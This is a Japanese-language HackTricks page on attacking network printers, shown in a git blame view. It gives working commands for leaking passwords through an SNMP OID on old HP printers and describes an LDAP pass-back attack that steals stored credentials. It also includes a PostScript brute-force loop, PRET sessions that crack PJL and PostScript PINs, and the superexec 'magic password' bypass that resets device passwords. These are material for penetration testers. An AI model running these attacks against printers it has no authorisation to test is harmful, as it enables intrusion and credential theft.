hacktricks/network-services-pentesting/pentesting-printers/credentials-disclosure-brute-force.md

107 lines
8.1 KiB
Markdown
Raw Normal View History

2023-07-07 23:42:27 +00:00
# 認証情報の漏洩 / ブルートフォース
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
2022-04-28 16:01:33 +00:00
</details>
2023-07-07 23:42:27 +00:00
プリンターは、**デフォルトのパスワードまたは初期パスワードが設定されていない**場合があります。いずれの場合でも、エンドユーザーまたは管理者はデバイスを保護するためにアクティブにパスワードを設定する必要があります。
2023-07-07 23:42:27 +00:00
## パスワードの漏洩
2022-05-01 13:25:53 +00:00
### SNMP
2023-07-07 23:42:27 +00:00
古いHPプリンターには、パスワードを返す脆弱なOIDがありました。他のベンダーでも同様のSNMPベースの問題が発生する可能性があります。
```
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
```
2023-07-07 23:42:27 +00:00
### パスバック
2023-07-07 23:42:27 +00:00
もしプリンタが外部のLDAPを使用してユーザーを認証している場合、この設定を変更する権限がある場合おそらくWebコンソールインターフェースを使用して、プリンタをあなたのLDAPサーバに接続させ、任意のユーザーを認証することができます。\
ただし、この設定を悪用して、プリンタがLDAPサーバに接続するために使用している資格情報を盗むこともできます。[詳細はこちらを参照してください](../../windows-hardening/active-directory-methodology/ad-information-in-printers.md)。
2023-07-07 23:42:27 +00:00
## ブルートフォース
2022-05-01 13:25:53 +00:00
### PJL
2023-07-07 23:42:27 +00:00
PJLパスワードは16ビットのキーサイズが制限されているため、ブルートフォース攻撃の脆弱性があります。30分以内に正しいパスワードを推測することができます。
2023-07-07 23:42:27 +00:00
ブルートフォースをテストするために、[PRET](https://github.com/RUB-NDS/PRET)の`lock`と`unlock`コマンドを使用することができます。
```
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF
```
2022-05-01 13:25:53 +00:00
### PostScript
2023-07-07 23:42:27 +00:00
PostScriptには2種類のパスワードがあります。`SystemParamsPassword`は用紙サイズなどの印刷ジョブの設定を変更するために使用されます。一方、`StartJobPassword`はサーバーループを終了し、PostScript環境を永久的に変更するために必要です。
2023-07-07 23:42:27 +00:00
PostScriptパスワードに対するブルートフォース攻撃は非常に高速に実行することができます。なぜなら、**PostScriptインタプリタは自らを解読するようにプログラムすることができる**からです。
```
/min 0 def /max 1000000 def
statusdict begin {
2023-07-07 23:42:27 +00:00
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
```
2023-07-07 23:42:27 +00:00
別のアプローチは、Adobeの独自の`superexec`オペレータを使用して、PostScriptパスワードを**バイパス**することです。このオペレータは、`internaldict`辞書に存在し、静的なマジックパスワード(`1183615869`によって「保護」されています。PostScriptコードをsuperexecにラップすることで、攻撃者は通常は無効なアクセスエラーが発生する言語のさまざまな保護メカニズムを無視することができます。以下に示すように、現在のパスワードを最初に送信せずにPostScriptパスワードを設定するために使用することができます
```
{ << /SystemParamsPassword (0)
2023-07-07 23:42:27 +00:00
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec
```
2023-07-07 23:42:27 +00:00
[PRET](https://github.com/RUB-NDS/PRET)のロックとアンロックのコマンドは、数値整数のPostScriptパスワードに対する**ブルートフォース**攻撃をテストするために使用することができます。また、**superexec magic**を使用してそれらを**バイパス**することもできます。
```
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0
```
2023-07-07 23:42:27 +00:00
**[http://hacking-printers.net/wiki/index.php/Credential_disclosure](http://hacking-printers.net/wiki/index.php/Credential_disclosure)**には、パスワードの漏洩とブルートフォースに関する詳細な情報があります。
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
2022-04-28 16:01:33 +00:00
</details>